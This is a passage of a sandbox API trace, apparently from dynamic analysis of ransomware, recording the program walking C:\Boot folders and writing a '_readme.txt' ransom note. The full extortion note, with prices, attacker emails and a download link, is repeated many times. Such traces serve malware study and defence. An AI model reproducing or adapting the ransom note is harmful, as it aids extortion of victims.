if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda" [0090.734] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda", lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" [0090.734] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99cad78 [0090.734] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\_readme.txt" (normalized: "c:\\boot\\cs-cz\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0090.735] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8b0) returned 0x31cf750 [0090.735] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x857) returned 0x3189d50 [0090.735] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x3189d50, cbMultiByte=2135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 1112 [0090.735] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x316f0d0 [0090.735] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3189d50 | out: hHeap=0x680000) returned 1 [0090.735] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.735] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 1111 [0090.735] WriteFile (in: hFile=0x5cc, lpBuffer=0x316f0d0*, nNumberOfBytesToWrite=0x457, lpNumberOfBytesWritten=0x9ccfb64, lpOverlapped=0x0 | out: lpBuffer=0x316f0d0*, lpNumberOfBytesWritten=0x9ccfb64*=0x457, lpOverlapped=0x0) returned 1 [0090.736] CloseHandle (hObject=0x5cc) returned 1 [0090.736] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316f0d0 | out: hHeap=0x680000) returned 1 [0090.736] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99cad78 | out: hHeap=0x680000) returned 1 [0090.736] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f52d8 | out: hHeap=0x680000) returned 1 [0090.736] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0090.736] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.736] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa3267ea0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3267ea0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6bdca8 [0090.737] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.737] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa3267ea0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3267ea0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.737] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0090.737] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3267ea0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa3267ea0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3267ea0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0090.737] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3267ea0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa3267ea0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa3267ea0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0090.737] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0090.737] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.737] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef28 | out: hHeap=0x680000) returned 1 [0090.737] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef28 [0090.737] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0090.737] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.737] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.737] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.737] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.737] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.737] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.737] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.737] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.737] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.737] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.737] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.737] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.737] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.738] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.738] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.738] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.738] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.738] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0090.738] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.738] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.738] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.738] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0090.738] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.738] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.738] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.738] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.738] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99e3968 [0090.738] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.738] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3968 | out: hHeap=0x680000) returned 1 [0090.738] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0090.738] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.738] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0090.738] PathFindFileNameW (pszPath="C:\\Boot\\da-DK\\") returned="da-DK\\" [0090.738] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.738] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0090.738] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0090.738] PathFindFileNameW (pszPath="") returned="" [0090.738] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efba8 [0090.738] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0090.739] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0090.739] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x800) returned 0x31d1120 [0090.739] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0090.739] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x810) returned 0x99ca4f0 [0090.739] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1d0 [0090.739] FreeLibrary (hLibModule=0x75670000) returned 1 [0090.739] PathAppendW (in: pszPath="C:\\Boot\\da-DK\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\da-DK\\_readme.txt") returned 1 [0090.739] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0090.739] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0090.739] PathFileExistsW (pszPath="C:\\Boot\\da-DK\\_readme.txt") returned 0 [0090.740] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x7d00) returned 0x99f52d8 [0090.740] lstrcpyW (in: lpString1=0x99f52d8, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda" [0090.740] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sda", lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" [0090.740] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99cad78 [0090.740] CreateFileW (lpFileName="C:\\Boot\\da-DK\\_readme.txt" (normalized: "c:\\boot\\da-dk\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0090.740] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8b0) returned 0x31cf750 [0090.740] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x857) returned 0x3189d50 [0090.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x3189d50, cbMultiByte=2135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 1112 [0090.740] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x316f0d0 [0090.741] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3189d50 | out: hHeap=0x680000) returned 1 [0090.741] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0090.741] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UdTNsLeiJA\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0200a7d6a8sdaywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 1111 [0090.741] WriteFile (in: hFile=0x5cc, lpBuffer=0x316f0d0*, nNumberOfBytesToWrite=0x457, lpNumberOfBytesWritten=0x9ccfb64, lpOverlapped=0x0 | out: lpBuffer=0x316f0d0*, lpNumberOfBytesWritten=0x9ccfb64*=0x457, lpOverlapped=0x0) returned 1 [0090.742] CloseHandle (hObject=0x5cc) returned 1 [0090.742] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316f0d0 | out: hHeap=0x680000) returned 1 [0090.742] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99cad78 | out: hHeap=0x680000) returned 1 [0090.742] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f52d8 | out: hHeap=0x680000) returned 1 [0090.742] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0090.742] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef78 [0090.742] FindFirstFileW (in: 